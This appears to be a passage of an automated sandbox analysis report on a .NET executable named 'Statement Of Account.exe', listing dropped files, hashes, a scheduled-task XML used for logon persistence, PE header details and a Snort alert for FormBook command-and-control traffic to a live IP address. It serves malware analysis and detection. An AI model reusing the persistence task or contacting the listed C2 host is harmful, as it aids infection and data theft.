                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1216
                                                                                          Entropy (8bit):5.34331486778365
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Statement Of Account.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\Statement Of Account.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1216
                                                                                          Entropy (8bit):5.34331486778365
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):2232
                                                                                          Entropy (8bit):5.379736180876081
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyuVws:tLHyIFKL3IZ2KRH9OugbVws
                                                                                          MD5:309A50A114E63D1E572754724776386D
                                                                                          SHA1:BB6BCDD6CB7D94B3CE56404054F0CC463309F4B2
                                                                                          SHA-256:77148DAFF9333012558B6E4165D6EB819E431EAD853778D8F53C6C5570E5BB59
                                                                                          SHA-512:6EEB094D32A14C38B2CD79A25545643852B2AF81CA3683D3CC7E8D14C675405125E49B369BD8173F30EF64C0813D660012AFC6CBE77671081B8936C0C81F6B40
                                                                                          Malicious:false
                                                                                          Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0szouwsm.4bb.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cjykfmk.3zy.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ilbc0t2.sku.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2jufomu.5gt.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psor12ay.l0t.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbc5muss.h2a.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjzgj3lt.pxr.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztjbmj0w.vzn.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\Statement Of Account.exe
                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):1574
                                                                                          Entropy (8bit):5.117435309308349
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta7xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT8v
                                                                                          MD5:5BB8995E540EA0C5FDD2D926EBD3BC76
                                                                                          SHA1:72519A450958D9377DB308B10459D98556F38C15
                                                                                          SHA-256:FB48F23B864BCCDD3A31EB79C7E9C72E910FE70A3B0CB9569A966A8A1CE7BA07
                                                                                          SHA-512:16DB902A65E167376B8FB4883440AEE883C3606C4D63FB6653D176BD55E6BBC59A797AD53C974C7DF46B046E35527033D53A918B505DC23D90CED7B2F4956831
                                                                                          Malicious:true
                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                          C:\Users\user\AppData\Local\Temp\tmpAA00.tmp

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\SdYCcXyq.exe
                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):1574
                                                                                          Entropy (8bit):5.117435309308349
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta7xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT8v
                                                                                          MD5:5BB8995E540EA0C5FDD2D926EBD3BC76
                                                                                          SHA1:72519A450958D9377DB308B10459D98556F38C15
                                                                                          SHA-256:FB48F23B864BCCDD3A31EB79C7E9C72E910FE70A3B0CB9569A966A8A1CE7BA07
                                                                                          SHA-512:16DB902A65E167376B8FB4883440AEE883C3606C4D63FB6653D176BD55E6BBC59A797AD53C974C7DF46B046E35527033D53A918B505DC23D90CED7B2F4956831
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                          C:\Users\user\AppData\Roaming\SdYCcXyq.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\Statement Of Account.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):791040
                                                                                          Entropy (8bit):7.022673278804772
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:xSNhWU2EOum32U5Gt68PG+SAJYyEQzHmt5xCohEotOJ6E+L+BtN:xSLrvUGt07MY9xCohEl8LaN
                                                                                          MD5:DA68E8FF4E0C0D00C613FA9301CF4A37
                                                                                          SHA1:7456CF2540DCE6403407B532C502CE5ABB07E9EC
                                                                                          SHA-256:B7DEF3AF905789A4ECEDCC226D91592D8BC758CE8C5458D62EF435707DE8670F
                                                                                          SHA-512:3AC31E76311AD1ACEC983DEDB6F2142471A6225BB279A5C9425FD75A15971D2E635EC4D7DFC8A060B1D647EF67D168504452A4ACF4500047F31C63C932DE99F6
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 24%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u.'f..............0..............&... ...@....@.. ....................................@..................................&..O....@.......................`......D...T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H........O...!....../....q..............................................B...}......}....*".(.....*...0............{.....+..*&...}....*B...}......}....*".(.....*V.(........s....}....*...0..E........r...p.{....s......s.....s......{....o.......o....&.{....o.......+..*....0..A..........{....s......s.....s......{....o.......o....&.{....o.......+..*^..}.....(.......(.....*....0...........s.......{....o.....{....o....o-.....{<...r3..p.{=...r3..p(....(....&r7..ps......o.....r...p.s..

                                                                                          C:\Users\user\AppData\Roaming\SdYCcXyq.exe:Zone.Identifier

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\Statement Of Account.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:false
                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.022673278804772
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:Statement Of Account.exe
                                                                                          File size:791'040 bytes
                                                                                          MD5:da68e8ff4e0c0d00c613fa9301cf4a37
                                                                                          SHA1:7456cf2540dce6403407b532c502ce5abb07e9ec
                                                                                          SHA256:b7def3af905789a4ecedcc226d91592d8bc758ce8c5458d62ef435707de8670f
                                                                                          SHA512:3ac31e76311ad1acec983dedb6f2142471a6225bb279a5c9425fd75a15971d2e635ec4d7dfc8a060b1d647ef67d168504452a4acf4500047f31c63c932de99f6
                                                                                          SSDEEP:12288:xSNhWU2EOum32U5Gt68PG+SAJYyEQzHmt5xCohEotOJ6E+L+BtN:xSLrvUGt07MY9xCohEl8LaN
                                                                                          TLSH:D4F49E3D18BE22BB81B9C6A9CFD5882BF540E46B7051AD7498D747A55343E4B38C323E
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u.'f..............0..............&... ...@....@.. ....................................@................................

                                                                                          File Icon

                                                                                          Icon Hash:90cececece8e8eb0

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x4c26e2
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x6627C475 [Tue Apr 23 14:23:49 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc268d0x4f.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5c4.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc60000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xc13440x54.text
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000xc06e80xc0800ad3f0459f9e92d15dc36ffff13beb716False0.7428305093344156data7.029755289423976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0xc40000x5c40x600ef6b1b1acac0f947d51056f81b57256aFalse0.421875data4.1111917842426315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0xc60000xc0x2004231205143541a27ddc6e9ad2ec73c28False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_VERSION0xc40900x334data0.42073170731707316
                                                                                          RT_MANIFEST0xc43d40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Network Behavior

                                                                                          Snort IDS Alerts

                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                          04/23/24-18:44:06.302513TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.491.195.240.94
